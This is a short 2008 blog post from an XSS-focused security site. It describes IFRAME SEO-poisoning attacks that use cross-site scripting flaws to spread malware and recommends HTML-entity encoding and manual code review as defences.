XSS SEO poisoning attacks on the rise. How to protect against?

Written by DP

Monday, 31 March 2008

In order to have a better understanding about this subject matter, I suggest that you read Dancho Danchev's blog post:

Massive IFRAME SEO Poisoning Attack Continuing

Another good post by RSnake:

XSS, Redirects and SEO

Malicious people spread malware by exploiting XSS vulnerabilities on high profile websites. More specifically they inject an IFRAME which loads malicious content from different IP sources around the globe. The excellent SEO applied to most high pagerank websites, as a result attracts too many web users who unwittingly click the indexed trap links in SERPs after searching for a popular keyword, and consequently get affected by malware, adware and spyware.

A solution that would prevent such a critical issue to reoccur, is to convert all applicable characters to HTML entities in the source code:

It is better to manually review codes than to use automated reviewing software. This is a time consuming, yet rewarding process that should be done carefully and with attention to the last detail. A major advantage would be to retain your visitors's faith and even attract more visitors by showing that you protect their privacy and security. You show this by not being in the negative spotlight of the media about vulnerabilities in your website. You also don't want to knowlingly harbor them because your business and famousness will be at great risk. Placing a "Hacker Safe" badge won't do any good either.

Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.